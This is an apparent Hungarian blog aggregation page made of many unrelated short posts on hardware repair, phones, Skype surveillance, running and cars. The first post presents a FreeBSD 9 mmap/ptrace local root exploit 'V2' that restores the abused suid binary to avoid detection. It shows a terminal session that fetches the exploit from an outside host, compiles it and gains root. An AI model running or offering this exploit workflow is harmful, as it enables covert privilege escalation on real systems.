Blogbejegyzések

Az eredeti exploit módosítva hagyta legtöbbször a támadáshoz használt suid root binárist, így mindig utána egyből rootot adott és az eredeti feladatát nem látta el a továbbiakban. Ez feltűnhet az üzemeltetőknek és kibukhat hash ellenőrzéskor, ezért ez az új változat már helyreállítja az eredeti állapotot, hogy ne maradjon nyom... :)

$ uname -a
FreeBSD fbsd91x64 9.1-STABLE #8: Wed Jun 18 10:32:07 CEST 2013
     root@fbsd91x64:/usr/src/sys/amd64/compile/STABLE  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ ftp -V http://hunger.hu/fbsd9lul2.c
$ gcc fbsd9lul2.c -o fbsd9lul2
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ ./fbsd9lul2
FreeBSD 9.{0,1} mmap/ptrace exploit V2
Clean-up version (no backdoor left)
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# exit
$ ls -la /sbin/ping
-r-sr-xr-x   1 root  wheel      28008 Dec  4  2012 ping
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ /sbin/ping
usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]

...

Hogy mikre nem jó a 9gag… Most éppen a jövő márciusra tervezett mobilos AoE-ről értesültem onnan. Hitelesebb forrás a Reuters, ott megtudni azt is, hogy egyelőre csak az AoE jön, elsőként Androidra és iOS-re, később Windows Phone-ra is.

Kaptam egy régi dell lapost, amit elkezdtem csinálgatni. Kapásból a cpu coolert darabokra törtem, de ezt már korrigáltam, a slot1-es foglalat erősen rossz, tehát egy rammal megy. 2.2-es cpu, 40-es hdd, 32-es ati vga :(. Sajna ubuntu nem hajlandó nagyon együttműködni vele (de lehet én vagyok balfék hozzá), mivel a videókat nem nagyon akarja laggolásmentesen vinni. Tehát elindítok egy .avi-t és szaggat simán a videó. Namost, ezt vagy megoldom, hogy ubuntu alatt ne szaggasson, (prio1) vagy megy rá xp (prio[sok]). Esetlegesen ha valakinek van valami ötlete a videó problémára, szívesen fogadok minden jótanácsot, ötletet.
# ubuntu 12.04

magyar expert telepỉtes:
magcsomagok telepitese.... :)

Van erre egy dilettáns lapgazda, remélem, olvassa.

Történt pár évvel ezelőtt (is), hogy segítő szándékkal rászóltam az akkor még SKL (Segítsük Kibontakozni a dilettáns Linukszozókat) adminjára, hogy ha már portált vezet, akkor ügyelhetne a fogalmazásra, az írásmódra.
Ezen úgy berágott, hogy kitiltott az oldaláról.

Az oldalt azóta is pofozgatják páran, Magyarország Vezető Informatikai Portáljaként aposztrofálják, a neve jelenleg Androbit.

Mit nem látok pár hónapja: heti hírleveleket küld nekem a Köcsög Portál.
Duplán poénos ugye: évek óta nem vagyok "tag", sosem tudtam feliratkozni semmiféle hitlevélre, mégis kapom.
(Köcsög Spammer. Ez tény.)
Második tény: van leiratkozás link a Köcsög levelében. Odavisz az Andorbitt oldalra, ahol ahelyett, hogy megnyomhatnám a "baszd szájba anyádat a köcsög hírleveleddel" linket, pofámba vigyorog a felirat, hogy
"A hírlevélre fel- és leiratkozni csak belépett felhasználó tud"

Mivel en szoptam mar eleget azzal, hogy kicsikarjam a support-bol a korabbi verziokat, keszitettem egy oldalt ezek osszegyujtesere, hogy masnak mar ne kelljen veluk szajkarateznia.

Grandstream Firmware Archive

Ezen kivul lesz meg post GXP2000 illetve a nextgen (GXP2100 stb) kozponti konfigjarol is, utobbihoz AD-integralt telefonkonyv is, stay tuned.

UPDATED! - Grafikus progress bar

Fájlfeltöltés + progress bar

http://html5.ugyesen.com/2013/06/html5-es-file-api/

A debugfs az ugyanaz az Ext[234] fájlrendszernél, mint hagyományos UNIX-rendszereken az fsdb. Egy olyan eszköz, amivel a fájlrendszer bugyraiban turkálhat az ember. Ha mer turkálni, mert nem félti az adatait (vagy éppen pont megmenteni szeretné azokat).
Miután ezen a héten valakinek pont azt bizonygattam, hogy milyen stabilan kezelhető Ext3 (OK, napló nélkül, azaz Ext2-ként) FreeBSD alatt, tegnap délután belefutottam egy szép kis hibába. Egy 2 TB-os FS (100%-os telítettség és -2.2 GB szabad hely mellett) egyes részei eléggé extrém hibákat adnak amikor a FreeBSD natív ext2 driverével felmountolva akarom olvasni. Pl. egy könyvtár egyetlen fájlja (minden egyéb csak alkönyvtár) nem olvasható. Egy alkönyvtár teljes egészében üresnek látszik. Egy másik alkönyvtár fájljainak kb fele szintén látszik, de nem olvasható. Ugyanez a diszk rádugva egy Ubira szépen látszik, az adatok elérhetők - véletlenszerű, de eredetileg hibát produkáló fájlokba bleolvasva, ott vannak az adatok. Futtattam a diszken egy force fsck-t, hogy gatyába rázzam - de hiába. Visszatéve FBSD alá, ugyanaz a hiba. Mivel a diszk korábbi élete során időnként adott vicces hangokat, azt hinném diszkhiba, de ennek egyrészt ellentmond az Ubi alatti olvashatóság, sőt az is, hogy éppen Norton Disk Editort játszok rajta, és egyrészt egy szál hibaüzenet sincs, másrészt a debugfs dump és rdump parancsával gyönyörűen kinyerhetők az adatok. Ez összevetve az igen elegáns FS errorral amit kapok arra enged következtetni, hogy valahol (a FreeBSD-féle) ext2fs driverben van valami hülye előjelkezelési hiba. Lehet forrást kéne túrnom. Most egyelőre szépen mentegetem a dolgokat, és próbálom magam rávenni, hogy ebben a szép nyári időben FS-driver forrást olvasgassak. (Amiben az a szép, hogy nem igazán ismerem az ext2 belsejét - sőt egészen eddig nem is terveztem ismerni.)

oly messze van...
Lassan inkább arra készülék, mi az a nemlét... Vajon Gergő tényleg engem visz-e tovább?
Oyan jókat buliztunk valaha... Majd húsz éve már, ki emlékszik még rám? Laca, Atesz? Luxi?
Black Sabbath - Children of the Sea
Akela - Nekik mondd!
Moby Dick Keresztes vitéz
Nevergreen - Anyánk az éj
Faszom, annyi dal van még...

Vettem 1 Nexus 4-et, ugyhogy izibe fel is raktam ra egy Ubuntu Touch-ot. A telepites eleg egyszeru volt, nemsokat kellett vele vacakolni. A phablet-flash jol vegezte a dolgat, egeszen addig, amig nem akartam varilni a dolgot.

A legujabb Saucy image kerult fel ra. Sajnos hasznaljhattlanul mukodott. Pl. az inditopanelt nem sikerult megfeleloen elohozni, ures es/vagy nem mukodo ikonok es egyeb, nem mukodo funkciok.

A rendszer sajnos meg nem kezeli a PIN kodokat, de nekem azt kiutve sem sikerult kapcsolatot letrehoznom a mobil halozattal.

1x sikerult lefagyasztanom is, pedig olyat mar reg nem csinaltam teloval.

Úgy néz ki, hogy megtörték. Valaki nem tudja, hogy milyen verziójú WordPress-t használtak? Ennyire régi kódot használtak? Azért érdeklődöm, mert nekem is van egy menedzselt WordPress oldalam.

Minden egyes alkalommal, amikor kilepek a youtube-rol:

Elindítottam 12:18-kor:

./chromium.SlackBuild

17:00 van. Még teker :)

Első csomagolásom. Mi lesz ebből...

Az "erőmű:" AMD Duron 1300 MHz, 640 MB RAM, Slackware 14.

-szerk.-
18:10, még mindig. Kezdem unni.

-szerk.-
19:14, lelőttem.

Net szerte sokan keresnek egyszerű 2D támogatást Ruby-hoz, de nincs igazán olyan, amelynél a futtatási környezet telepítésével ne lenne komolyabb szívás (pl. Gosu vagy Rubygame meg hasonlók). Akár egyszerűbb fizikai szimulációkhoz, akár egyéb algoritmusok szemléltetéséhez hasznos lenne pedig.

Sok időm ráment, mire megtaláltam a megfelelő megoldást. Ezután létrehoztam egy Screen osztályt, mellyel könnyen bekapcsolhatunk egy SDL képernyőt és nagyon egyszerűen rajzolhatunk rá.

Git tárolómban megtalálhatók a példa kódok sdl_testX.rb néven, melynek elején kommentezve olvasható a futtatási környezet telepítése.

Skype, bought by Microsoft in May 2011. In 2012, there were discussions about whether Microsoft had changed Skype's architecture in order to make snooping easier (the company even had a patent on the idea.) The recent leaks seems to confirm that those fears were well founded, as Slate points out:

There were many striking details in the Washington Post’s scoop about PRISM and its capabilities, but one part in particular stood out to me. The Post, citing a top-secret NSA PowerPoint slide, wrote that the agency has a specific “User’s Guide for PRISM Skype Collection” that outlines how it can eavesdrop on Skype “when one end of the call is a conventional telephone and for any combination of 'audio, video, chat, and file transfers' when Skype users connect by computer alone.”

A hangzó anyag szövegfelismerése már volt téma itt, de szeretném letisztázni az eddigi eredményeket, s esetleg ötleteket gyűjteni újrakra. Annak is örülnék, ha lenne lehetőség visszajelezni a Google hangfelismerőjének, hogy (szerintem) mi lett volna a helyes eredmény egy-egy mondat felismeréseként. Az eljárásom tehát a következő:

1. Van egy kiindulási hangfájlunk (MP3, de még jobb, ha valami tömörítetlen fajta)
2. Ezt feldarabolom, lehetőleg mondatonként, és FLAC fájlokká alakítom
3. A darabokat elküldöm a Google-nak (tudva, hogy milyen típusú a küldött fájl)
4. Az eredményt összefűzöm és megszűröm az obszcén vagy tudottan félreértett kifejezésektől
5. Kézzel feljavítom a válasszöveget, teszek bele központozást és nagybetűket.
6. A végeredményt egy szintaktikai javítószkriptnek vetem alá.

A részletek:

Valahol a neten van egy szörny katalógus (lények, jelenségek, objektumok, stb.), amit nem bírok megtalálni. Sajnos sok mindenre nem emlékszem belőle, de volt talán a "bezárt szobában mozgó beton tömb" nevű szörny/jelenség, amit soha senki nem lát mozogni, de ahányszor benéznek a szobába, mindig kicsit máshol van.

Guglizással minden hülyeség előjött már, csak ez nem. :)
Esetleg megvan vkinek a link?

Lett egy kis komplikáció. Ha van fácse accod és kedved, akkor itt tudsz véleményt nyilvánítani:
https://www.facebook.com/questions/521273601265134/

Új nap
Ismerősöm hozott egy gépet telepítsem újra mert nem jó teljesen rendben újra telepítettem, ezután kezdődtek furcsaságok, ram hibák, szagatott minden nem is használta semmi a gépet stb:)
Szedtem neki hanghoz Realtek ACL 260 drivert meg Intel GMA 950 et, felraktam jöttek furcsa hiba üzik windóztól,hol elindult hol nem mint a népmesében.
Aztán sikeresen tönkretette a boot rekordot, és fogad a szép képernyő : /system32/hal.dll hiányzik vagy hibás." Kérjük telepítse újra a windózt...
A gép egy Fuji Siemens Esperimo E 5905
Új korában így nézhetet ki: http://uk.ts.fujitsu.com/rl/servicesupport/techsupport/professionalpc/E…

múltkor a bükkben voltam, az alaptábort kb 300 méteren állítottuk fel Lillafüreden, ahonnan először csak amolyan bemelegítési szándékkal kisebb dombokra kaptatva különféle állatok megfigyelése zajlott, majd felkészülési jelleggel autóval felmentünk szilvásváradi kilátóba és még tovább, akár 600 méter magasságig. ezután került sor a csúcstámadásra, nehezedő vagy enyhülő időjárási viszonyok -attól függ honnan nézzük- közepette, ami aztán végül több halálesettel járt. szerencsére csak a pisztrángok számára, mert hű serpámmal előrelátóan pet palackban vittük az oxigént valamivel kevesebb hidrogénnel elegyítve. ezek után muszáj volt fürdeni egyet a barlangban és az utóbbi napok időjárása pont az ottani gőzfürdőre emlékeztetett.

elkezdtem a runkeeper edzésprogramját, egyik nap a telefon elvesztette a gps jelet pedig a booster is ment, huzigálta is összevissza az útvonalat. ma megint erre gyanakodtam mert nem mondta kilométerenként, hogy hol állok, de csak én voltam béna és a time triggerrel együtt a km triggert is none-ra állítottam. se a gps baki, se ez nem volt lényeges, mert azzal indul a program, hogy 30 perc steady, lefordítva magamra: fuss olyan lassan amilyen lassan csak tudsz, kb 7 perces km-ek. ez egyébként unalmasabb mint tempósan futni. viszont ez úgy megy, hogy van 5 perc bemelegítés és 5 perc levezetés közte a 30 perc lassúzással és ezt picit hülyén kezeli a program, egyrészt az első öt perc benne van az első 1kmben, másrészt amikor lejár az 5+30 perc akkor workout complete, a maradékkal meg csináljak amit akarok. ma több lehetett a pára vagy melegebb volt és nem futottam végig a 40 percet, a workout complete után gyalogolva folytattam. a következő érdekes a 3 perces fartlek lesz. még egy bénaság: a telefonon az edzésprogramban nem mutatja a km-ek idejét, csak weben, míg free workoutnál meg igen. végül jó 7 percen belüli km-eket mentem, kíváncsi leszek menni fog-e 2x10 percen a 6 perc/km.

mint írtam, megvan az autó. kicsit félrement az eredeti elképzelésekhez képest, de pont jól van így, szuper gép. Jetta benzin 1,6. egy öreg tagé volt, nem villogott vele és nem tépte. 10 légzsák & ABS, ESP, kapcsolható ASR & gyári hifi kiépítésben. 110e km van benne trükkök nélkül. elég fura volt ismét használt autót venni, 5 éve nem volt részem ilyenben.

ahogyan korábban írtam, ilyenkor nem érdekel mit mondanak (hazudnak) a cserélt dolgokról és szervizekről. tehát a "régi" szokásoknak megfelelően azonnal cserélődött: vezérlés szett (szíj és görgők) & vízpumpa, hosszbordás szíj szett, légszűrő, pollenszűrő, üzemanyagszűrő, brand motorolaj, brand váltóolaj, fékolaj, fagyálló, szelepfedél tömítés (ez akut volt), gyertyák. továbbiakat tekintve váltózár lett beépítve (nyilván Kaba betétes).

Mindig úgy gondoltam, hogy az optikai tárolás a jövő egyetlen tárolási formája lesz, amely szinte végtelen tárkapacitást tesz majd lehetővé, olcsón.
Hogy ez a technológia növesztett kristályokban mikor fog megjelenni? Azt a kort várom :)
Addig is:
http://theconversation.com/more-data-storage-heres-how-to-fit-1-000-ter…

Üres perceimben elkezdtem írni egy terminál-FAQ című dolgozatot, hátha valakit érdekel. Vagy ha nem, legalább nekem megmarad írásban.

Ugyanitt megemlítem, hogy a dtelnet most éppen apró darabokra van szétszedve, de már elkezdtem összerakni. A gond a kijelölések hibás működésével kezdődött, azután volt némi pixel-dropping ClearType használatánál, azután elkezdtem egyes részeket átszervezni, hogy legalább én értsem, mi történik, azután a színek kezelését is megkavartam; később jelentkezett valaki, hogy a scrolling region kezelése problémás, viszont kellene neki az aláhúzás... Szóval kavaros az egész...

http://hackatool.blogspot.co.at/2013/05/simple-tool-to-visualize-connec…

visualize_qt_connections --path proj > proj.dot
# vi proj.dot
circo -Tpng -o proj.png proj.dot